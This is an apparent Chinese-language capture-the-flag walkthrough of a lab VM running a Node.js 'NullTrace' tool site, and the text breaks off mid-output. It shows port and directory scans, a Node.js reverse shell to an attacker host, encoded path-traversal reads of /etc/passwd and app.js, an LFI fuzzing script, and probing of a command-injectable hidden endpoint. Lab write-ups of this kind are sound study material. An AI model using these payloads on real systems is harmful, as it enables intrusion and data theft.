![\"image-20240712183313548\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537899.png\")
<\/div>\n
![\"image-20240809114900308\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537901.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.103:22\nOpen 192.168.10.103:80\nOpen 192.168.10.103:4000\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 3072 d9:75:70:c0:72:4c:4b:df:66:54:15:e7:77:37:44:18 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3M700tkvIKlRU2W80ESj8iG6n1aHoOBcpf1Sg17U8kZe6AgY72CF7B1vmRvAnVJaYfMIOIO+qFLtGky\/+iKy48zcGOv3woQGoJaQBN0RsUrS2VR5lTYXR0iQKGF0AyexRIaBvWfMkMSmr5KOFTA5PXg9Q2GeyKWxnewsAm+7zgwGa0oE4J+qjikfWuqmKZOgOBzuBdK+fd2TQNcnglZhYfP3PPEMZY1ePxhCN\/wWecBBbjTXc67Tf5qADKsDliU9wdxp+Yv4u\/qe9cAcYlHdgC1MTGXN75Pn+IzWleUzqZS6CAGq2LHLxGx9J9W5VoHDns9enY9H19xINhYp312OvMQo9osaWqoR2w88fdpjAR6N\/7p2sPXvYG7sVfCb68T1Pjxsg\/9Nuy9QvfeWYqaIIt7Ry32Tt0Q0WTzegQpGRK8HsS4fGf7S2GDUs3FSfg\/PSCnIMZNqOM7BivwDOSxh14Elyy6AJXViYuycZO8QnOHAOMI5uWzbZ++ALlmdxMQs=\n| 256 3d:47:46:10:4a:5a:ee:b9:5f:94:61:bd:08:ff:7d:bb (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK\/Sg1X3XisZwfkGdPEeBo+ObY7+QIGdPk4m2cweF+myUy87mVPaD56mIFz3pFozfxvZKCNH1LjMsGFH1lXQAso=\n| 256 be:bc:64:9a:c4:45:32:83:ed:6c:50:c2:2a:a1:a9:a4 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK0pzA44OqYBOt9Nk26VpZXfZrbRtmjgUiulqFY8N\/YS\n80\/tcp open http syn-ack Apache httpd 2.4.48 ((Debian))\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_ Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.48 (Debian)\n4000\/tcp open http syn-ack Node.js (Express middleware)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-title: NullTrace\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.103\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 301,401,403,404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 10701]\nProgress: 9776 \/ 882244 (1.11%)[ERROR] Get "http:\/\/192.168.10.103\/works.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/body.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 83338 \/ 882244 (9.45%)\nProgress: 130744 \/ 882244 (14.82%)\nProgress: 175649 \/ 882244 (19.91%)\nProgress: 252871 \/ 882244 (28.66%)[ERROR] Get "http:\/\/192.168.10.103\/caepipe.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 379668 \/ 882244 (43.03%)[ERROR] Get "http:\/\/192.168.10.103\/51118853.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/51118853.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/Sell_Mat.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 412103 \/ 882244 (46.71%)[ERROR] Get "http:\/\/192.168.10.103\/90368.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/coolhand": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/coolhand.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 464470 \/ 882244 (52.65%)[ERROR] Get "http:\/\/192.168.10.103\/95843": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/163958.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/105473": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/95843.php": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/95843.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 487735 \/ 882244 (55.28%)[ERROR] Get "http:\/\/192.168.10.103\/51396.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 489683 \/ 882244 (55.50%)[ERROR] Get "http:\/\/192.168.10.103\/81758.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/38348.txt": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/42761": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/42761.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/51397": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/192.168.10.103\/38348.html": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n\nProgress: 493426 \/ 882244 (55.93%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 493493 \/ 882244 (55.94%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u626b\u4e0d\u51fa\u6765\u62c9\u5012\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text \n\n[Debian Logo] Apache2 Debian Default Page\nIt works!\nThis is the default welcome page used to test the correct operation of the\nApache2 server after installation on Debian systems. If you can read this page,\nit means that the Apache HTTP server installed at this site is working\nproperly. You should replace this file (located at \/var\/www\/html\/index.html)\nbefore continuing to operate your HTTP server.\nIf you are a normal user of this web site and don't know what this page is\nabout, this probably means that the site is currently unavailable due to\nmaintenance. If the problem persists, please contact the site's administrator.\nConfiguration Overview<\/code><\/pre>\n\u5c31\u662f\u4e00\u4e2aapache\u9ed8\u8ba4\u9875\u9762\u3002<\/p>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\u770b\u4e00\u4e0b\u8fd9\u4e2a4000<\/code>\u7aef\u53e3\u600e\u4e48\u6d4b\u8bd5\uff1a<\/p>\n![\"image-20240809120951463\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u627e\u5230\uff1a<\/p>\n
<script>\n function ping() {\n ip = document.getElementById("pingIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/ping\/" + ip, false);\n xhttp.send();\n document.getElementById("pingResult").innerHTML = xhttp.responseText;\n }\n\n function portscan() {\n ip = document.getElementById("portscanIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/portscan\/" + ip, false);\n xhttp.send();\n document.getElementById("portscanResult").innerHTML = xhttp.responseText;\n }\n\n function whois() {\n ip = document.getElementById("whoisIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/whois\/" + ip, false);\n xhttp.send();\n document.getElementById("whoisResult").innerHTML = xhttp.responseText;\n }\n\n function base64e() {\n data = document.getElementById("base64eIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/base64\/encode\/" + data, false);\n xhttp.send();\n document.getElementById("base64eResult").innerHTML = xhttp.responseText;\n }\n\n function base64d() {\n data = document.getElementById("base64dIn").value;\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/base64\/decode\/" + data, false);\n xhttp.send();\n document.getElementById("base64dResult").innerHTML = xhttp.responseText;\n }\n\n function passgen() {\n\n var xhttp = new XMLHttpRequest();\n xhttp.open("GET", "\/generate-password", false);\n xhttp.send();\n document.getElementById("passgenResult").innerHTML = xhttp.responseText;\n }\n <\/script><\/code><\/pre>\n\u53d1\u73b0\u6587\u4ef6\u4e0a\u4f20\u63a5\u53e3\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\u6587\u4ef6\uff0c\u5148\u6d4b\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/var\/www\/api\/uploads\/test.txt | html2text\nCannot GET \/var\/www\/api\/uploads\/test.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s http:\/\/$IP:4000\/uploads\/test.txt | html2text \njust a test......<\/code><\/pre>\n\u56e0\u4e3a\u8fd9\u4e2a\u7f51\u9875\u662fnodejs<\/code>\u521b\u5efa\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u76f8\u5173\u53cd\u5f39 shell\uff0c\u4f46\u662f\u53d1\u73b0\u5e76\u672a\u89e3\u6790\uff1a<\/p>\n(function(){\n var net = require("net"),\n cp = require("child_process"),\n sh = cp.spawn("bash", []);\n var client = new net.Socket();\n client.connect(1234, "192.168.10.104", function(){\n client.pipe(sh.stdin);\n sh.stdout.pipe(client);\n sh.stderr.pipe(client);\n });\n return \/a\/; \/\/ Prevents the Node.js application from crashing\n})();<\/code><\/pre>\nLFI<\/h3>\n
\u5c1d\u8bd5\u8fdb\u884c\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/..\/..\/..\/..\/etc\/passwd" | html2text \nCannot GET \/etc\/passwd\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd" \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\u8bfb\u53d6\u5176\u4ed6\u4e1c\u897f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ echo -n "..\/..\/..\/..\/..\/etc\/passwd" | xxd -p | tr -d '\\n' | sed 's\/\\(..\\)\/%\\1\/g'\n%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/$IP:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64" \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:114:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nit404:x:1000:1000:it404,,,:\/home\/it404:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nDebian-exim:x:107:115::\/var\/spool\/exim4:\/usr\/sbin\/nologin<\/code><\/pre>\n\u60f3\u7740\u641e\u4e2a\u811a\u672c\u8dd1\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/bash\nwhile IFS= read -r line; do\n urlcode=$(echo -n "$line" | xxd -p | tr -d '\\n' | sed 's\/\\(..\\)\/%\\1\/g')\n echo "[+] payload:$line" >> result.txt\n echo "[+] url_payload:$urlcode" >> result.txt\n curl -s "http:\/\/192.168.10.103:4000\/uploads\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f$urlcode" >> result.txt\ndone < \/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-linux.txt<\/code><\/pre>\n\u989d\uff0c\u4e0d\u80fd\u8bf4\u6ca1\u6709\u7528\uff0c\u53ea\u80fd\u8bf4\u4e00\u70b9\u7528\u4e0d\u5230\u3002\u3002\u3002<\/p>\n
\u770b\u5230\u4e4b\u524d\u7ed9\u5230\u7684\u76ee\u5f55\uff0c\u7ffb\u4e00\u4e0bapp.js<\/code>:<\/p>\n# \/var\/www\/api\/uploads\/test.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/uploads\/..%2Fapp.js"\nvar express = require('express');\nconst { exec } = require('child_process')\nconst { base64encode, base64decode } = require('nodejs-base64');\nconst whois = require('node-xwhois');\nconst ipRegex = require('ip-regex');\nvar generator = require('generate-password');\nconst fs = require('fs')\nvar multer = require('multer');\n\nvar storage = multer.diskStorage({\n destination: function (req, file, callback) {\n callback(null, '.\/uploads');\n },\n filename: function (req, file, callback) {\n callback(null, file.originalname);\n }\n});\n\nvar upload = multer({ storage: storage }).single('userFile');\nvar app = express();\napp.set('view engine', 'ejs');\n\napp.get('\/', (req, res) => {\n\n res.render('home');\n\n});\n\napp.get('\/ping\/:ip', (req, res) => {\n\n ip = req.params.ip\n if (ipRegex({ exact: true }).test(ip)) {\n\n exec("ping -c 3 ".concat(ip), (error, stdout, stderr) => {\n if (error) {\n\n }\n if (stderr) {\n\n }\n console.log(`stdout: ${stdout}`);\n res.send(`stdout: ${stdout}`)\n });\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/portscan\/:ip', (req, res) => {\n\n ip = req.params.ip\n\n if (ipRegex({ exact: true }).test(ip)) {\n\n exec("nmap -p 21,22,443,80,8080 -T4 ".concat(ip), (error, stdout, stderr) => {\n if (error) {\n\n }\n if (stderr) {\n\n }\n console.log(`stdout: ${stdout}`);\n res.send(`stdout: ${stdout}`)\n });\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/whois\/:ip', (req, res) => {\n\n ip = req.params.ip\n\n if (ipRegex({ exact: true }).test(ip)) {\n\n whois.whois(ip)\n .then(data => res.send(data))\n .catch(err => console.log(err));\n }\n else {\n res.send("This is not an IP");\n }\n\n});\n\napp.get('\/base64\/decode\/:data', (req, res) => {\n\n data = req.params.data\n base64decoded = base64decode(data)\n res.send(base64decoded)\n});\n\napp.get('\/base64\/encode\/:data', (req, res) => {\n\n data = req.params.data\n base64encoded = base64encode(data)\n res.send(base64encoded)\n});\n\napp.get('\/generate-password', (req, res) => {\n\n var password = generator.generate({\n length: 18,\n numbers: true,\n symbols: true\n });\n\n res.send(password)\n});\n\napp.get('\/uploads\/:filename', (req, res) => {\n\n finalPath = __dirname.concat("\/uploads\/").concat(req.params.filename)\n console.log(finalPath)\n fs.readFile(finalPath, 'utf8', (err, data) => {\n res.end(data);\n })\n});\n\napp.post('\/file', function (req, res) {\n upload(req, res, function (err) {\n\n if (req.fileValidationError) {\n return res.send(req.fileValidationError);\n }\n else if (!req.file) {\n return res.send('Please select a file to upload');\n }\n else if (err instanceof multer.MulterError) {\n return res.send(err);\n }\n else if (err) {\n return res.send(err);\n }\n\n exec("md5sum ".concat(__dirname).concat("\/uploads\/").concat(req.file.filename), (error, stdout, stderr) => {\n console.log(`stdout: ${stdout}`);\n res.end(`stdout: ${stdout}`)\n });\n });\n});\n\napp.get('\/internal-processes-v1-display', function (req, res) {\n\n uid = req.query.uid\n console.log(uid)\n exec("ps aux | grep ".concat(uid), (error, stdout, stderr) => {\n console.log(`stdout: ${stdout}`);\n res.end(`stdout: ${stdout} :: ${uid}`)\n });\n\n});\n\napp.listen(4000, function () {\n console.log('listening to port 4000')\n});<\/code><\/pre>\n\u53d1\u73b0\u4e00\u4e2a\u9690\u85cf\u7684api\u63a5\u53e3\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display" \nstdout: www-data 795 0.0 0.0 2420 584 ? S 02:14 0:00 \/bin\/sh -c ps aux | grep undefined\nwww-data 797 0.0 0.0 6180 712 ? S 02:14 0:00 grep undefined\n :: undefined<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ curl -s "http:\/\/192.168.10.103:4000\/internal-processes-v1-display?uid=root"\nstdout: root 1 0.2 0.4 98140 10088 ? Ss 02:08 0:01 \/sbin\/init\nroot 2 0.0 0.0 0 0 ? S 02:08 0:00 [kthreadd]\nroot 3 0.0 0.0 0 0 ? I< 02:08 0:00 [rcu_gp]\nroot 4 0.0 0.0 0 0 ? I< 02:08 0:00 [rcu_par_gp]\nroot 5 0.2 0.0 0 0 ? I 02:08 0:01 [kworker\/0:0-events]\nroot 6 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/0:0H-events_highpri]\nroot 8 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/u2:0-ext4-rsv-conversion]\nroot 9 0.0 0.0 0 0 ? I< 02:08 0:00 [mm_percpu_wq]\nroot 10 0.0 0.0 0 0 ? S 02:08 0:00 [rcu_tasks_rude_]\nroot 11 0.0 0.0 0 0 ? S 02:08 0:00 [rcu_tasks_trace]\nroot 12 0.0 0.0 0 0 ? S 02:08 0:00 [ksoftirqd\/0]\nroot 13 0.0 0.0 0 0 ? I 02:08 0:00 [rcu_sched]\nroot 14 0.0 0.0 0 0 ? S 02:08 0:00 [migration\/0]\nroot 15 0.0 0.0 0 0 ? S 02:08 0:00 [cpuhp\/0]\nroot 17 0.0 0.0 0 0 ? S 02:08 0:00 [kdevtmpfs]\nroot 18 0.0 0.0 0 0 ? I< 02:08 0:00 [netns]\nroot 19 0.0 0.0 0 0 ? S 02:08 0:00 [kauditd]\nroot 20 0.0 0.0 0 0 ? S 02:08 0:00 [khungtaskd]\nroot 21 0.0 0.0 0 0 ? S 02:08 0:00 [oom_reaper]\nroot 22 0.0 0.0 0 0 ? I< 02:08 0:00 [writeback]\nroot 23 0.0 0.0 0 0 ? S 02:08 0:00 [kcompactd0]\nroot 24 0.0 0.0 0 0 ? SN 02:08 0:00 [ksmd]\nroot 25 0.0 0.0 0 0 ? SN 02:08 0:00 [khugepaged]\nroot 43 0.0 0.0 0 0 ? I< 02:08 0:00 [kintegrityd]\nroot 44 0.0 0.0 0 0 ? I< 02:08 0:00 [kblockd]\nroot 45 0.0 0.0 0 0 ? I< 02:08 0:00 [blkcg_punt_bio]\nroot 46 0.0 0.0 0 0 ? I< 02:08 0:00 [edac-poller]\nroot 47 0.0 0.0 0 0 ? I< 02:08 0:00 [devfreq_wq]\nroot 48 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/0:1H-kblockd]\nroot 49 0.0 0.0 0 0 ? S 02:08 0:00 [kswapd0]\nroot 50 0.0 0.0 0 0 ? I< 02:08 0:00 [kthrotld]\nroot 51 0.0 0.0 0 0 ? I< 02:08 0:00 [acpi_thermal_pm]\nroot 52 0.0 0.0 0 0 ? I< 02:08 0:00 [ipv6_addrconf]\nroot 62 0.0 0.0 0 0 ? I< 02:08 0:00 [kstrp]\nroot 65 0.0 0.0 0 0 ? I< 02:08 0:00 [zswap-shrink]\nroot 66 0.0 0.0 0 0 ? I< 02:08 0:00 [kworker\/u3:0]\nroot 109 0.0 0.0 0 0 ? I< 02:08 0:00 [ata_sff]\nroot 110 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_0]\nroot 111 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_1]\nroot 112 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_0]\nroot 113 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_1]\nroot 114 0.0 0.0 0 0 ? S 02:08 0:00 [scsi_eh_2]\nroot 115 0.0 0.0 0 0 ? I< 02:08 0:00 [scsi_tmf_2]\nroot 116 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/u2:2-flush-8:0]\nroot 118 0.0 0.0 0 0 ? I 02:08 0:00 [kworker\/0:3-ata_sff]\nroot 152 0.0 0.0 0 0 ? S 02:08 0:00 [jbd2\/sda1-8]\nroot 153 0.0 0.0 0 0 ? I< 02:08 0:00 [ext4-rsv-conver]\nroot 187 0.0 0.6 48224 12332 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-journald\nroot 214 0.0 0.2 22060 5700 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-udevd\nroot 283 0.0 0.0 0 0 ? I< 02:09 0:00 [cryptd]\nroot 284 0.0 0.0 0 0 ? S 02:09 0:00 [irq\/18-vmwgfx]\nroot 285 0.0 0.0 0 0 ? I< 02:09 0:00 [ttm_swap]\nroot 286 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc0]\nroot 287 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc1]\nroot 288 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc2]\nroot 289 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc3]\nroot 290 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc4]\nroot 291 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc5]\nroot 292 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc6]\nroot 293 0.0 0.0 0 0 ? S 02:09 0:00 [card0-crtc7]\nroot 381 0.0 0.2 99824 5828 ? Ssl 02:09 0:00 \/sbin\/dhclient -4 -v -i -pf \/run\/dhclient.enp0s3.pid -lf \/var\/lib\/dhcp\/dhclient.enp0s3.leases -I -df \/var\/lib\/dhcp\/dhclient6.enp0s3.leases enp0s3\nroot 382 0.0 0.1 6684 2848 ? Ss 02:09 0:00 \/usr\/sbin\/cron -f\nroot 386 0.0 0.2 220740 6032 ? Ssl 02:09 0:00 \/usr\/sbin\/rsyslogd -n -iNONE\nroot 387 0.0 0.1 6756 3116 ? Ss 02:09 0:00 \/bin\/bash \/root\/.s\/starts.sh\nroot 389 0.0 0.2 21536 5528 ? Ss 02:09 0:00 \/lib\/systemd\/systemd-logind\nroot 390 0.0 0.2 14560 4944 ? Ss 02:09 0:00 \/sbin\/wpa_supplicant -u -s -O \/run\/wpa_supplicant\nroot 416 0.0 0.4 16396 9844 ? S 02:09 0:00 python3 socket-root.py\nroot 433 0.0 0.0 5784 1628 tty1 Ss+ 02:09 0:00 \/sbin\/agetty -o -p -- \\u --noclear tty1 linux\nroot 697 0.0 0.3 13292 7104 ? Ss 